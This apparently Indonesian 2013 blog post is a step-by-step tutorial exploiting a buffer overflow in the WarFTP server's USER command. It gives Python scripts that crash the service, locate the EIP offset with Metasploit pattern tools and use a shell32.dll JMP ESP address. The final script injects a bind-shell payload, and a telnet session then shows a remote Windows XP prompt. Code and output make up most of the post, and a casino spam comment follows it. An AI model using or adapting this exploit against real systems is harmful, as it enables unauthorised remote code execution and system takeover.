Rabu, 02 Januari 2013

FUZZING

Now, we will try exploit Warftp with Fuzzing. Let's try it step by step ..

First we create fuzzernya. This time we will make the language python fuzzer
import socket
s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
buffer ="\x41" * 1000
s.connect (('192.168.56.101' ,21))
data = s.recv (1024)
print ("sendingevildatavia USER command ...")
s.send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s.send ('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
save with .py extension

check that fuzzer run make applications crash or not.
Run warftp.

Then, the fuzzer in the terminal.

So the result, warftp will be lost. That's a sign we managed to make crahs fuzzer.
The next step, check using Olly DBG to know warftp crash in memory
OllyDbg run.
After warftp run, then run the fuzzer in backtrack. Here is the result

The next process is to make patter_create. The goal is to find out the true locations of sebuat string in data packets transmitted by the fuzzer. To do so type the command as below

copy and paste the results of patter_create into fuzzer.
As scribt below
import socket
s = socket.socket(socket.AF_INET,socket. SOCK_STREAM)
buffer ="Aa0Aa1Aa2Aa3A . ." #pattern_create
s.connect (('192.168.56.101' ,21))
data = s.recv (1024)
print ("sendingevildatavia USER command ...")
s.send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s.send ('PASS'+'\r\n')
s.close()
print("Finish")

Run back and warftp OllyDbg. Then run it again fuzzer
from the patter_create, obtained the address and ESP 32714131 EIP is q4Aq5A ...
The next look at how the string override byte register. In order to do so using patter_offset.
Open patter_offset and type the command as shown below
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 32714131
485
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb q4Aq5A
493

on the above data, it can be seen to achieve EIP registers required 485 bytes of data. While the data is needed to achieve a stack of 493 bytes. Therefore, it can be seen that will overwrite the EIP register byte 486, 487.488 and 489.

to prove it, the fuzzer change the variable buffer and add variable EIP in it. As scribt below
import socket
s = socket.socket(socket.AF_INET,socket. SOCK_STREAM)
buffer ="\x90" * 485
buffer+="\xEF\xBE\xAD\xDE"
buffer+="\x90" * (493-len(buffer))
buffer+="\xCC" * (1000-len(buffer))
s.connect (('192.168.56.101' ,21))
data = s.recv (1024)
print ("sendingevildatavia USER command ...")
s.send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s.send ('PASS'+'\r\n')
s.close()
print("Finish")

So the result as below

Furthermore, to find the address of a memory that stores the JMP ESP command run OllyDbg. On the View menu Select Sub menu Execute modules.

then double click shell32.dll and find (CTRL + F) JMP ESP. Will display memory address
7C9D30D7  FFE4 JMP ESP
7C9D30ED CC INT3

after successfully finding the address in memory ESP JSP Warftp, then enter the address into the fuzzer. As scribt below
import socket
s = socket.socket(socket.AF_INET,socket. SOCK_STREAM)
buffer ="\x90" * 485
buffer+="\xEB\x30\xD9\x7C"
buffer+="\xCC" * (493-len(buffer))
buffer+="\xCC" * (1000-len(buffer))
s.connect (('192.168.56.101' ,21))
data = s.recv (1024)
print ("sendingevildatavia USER command ...")
s.send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s.send ('PASS'+'\r\n')
s.close()
print("Finish")

run back Ollydbg and warftp. 

Next we create the payload. In this case, we use metasploit. Type the command as below
root@bt:~# cd /pentest/exploits/framework2/
root@bt:/pentest/exploits/framework2# ls
data exploits msfcli msfelfscan msfpayload msfweb sdk tools
docs extras msfconsole msfencode msfpescan nops src
encoders lib msfdldebug msflogdump msfupdate payloads t
root@bt:/pentest/exploits/framework2# ./msfweb

+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

after that, open the browser and type IP address

select the payload Tab and Filter Modules = os Win32. Then select Blind Shell

The result of Generate Payload


enter the results of paylod into fuzzer, as scribt below
import socket
s = socket.socket(socket.AF_INET,socket. SOCK_STREAM)
buffer ="\x90" * 485
buffer+="\xEB\x30\xD9\x7C"
buffer+="\x90" * 32
buffer+=("\x29\xc9\xb1\x51\xd9  . .) #Bind Shell
s.connect (('192.168.56.101' ,21))
data = s.recv (1024)
print ("sendingevildatavia USER command ...")
s.send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s.send ('PASS'+'\r\n')
s.close()
print("Finish")

we try running warftp and fuzzer.
After that, we try to telnet by typing the following command

root@bt:~# telnet 192.168.56.101 4444
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XP SP3\My Documents>

we can see that the payload successfully enter the buffer in the system warftp server and windows XP running payload successfully.

GOOD LUCK FOR YOUR TRY HARDER !!!

















1 komentar:

  1. What is the best virtual reality casino to make money?
    I've heard a lot of people say that หาเงินออนไลน์ virtual reality games are more about making money than making money. I've heard a lot of people say that

    BalasHapus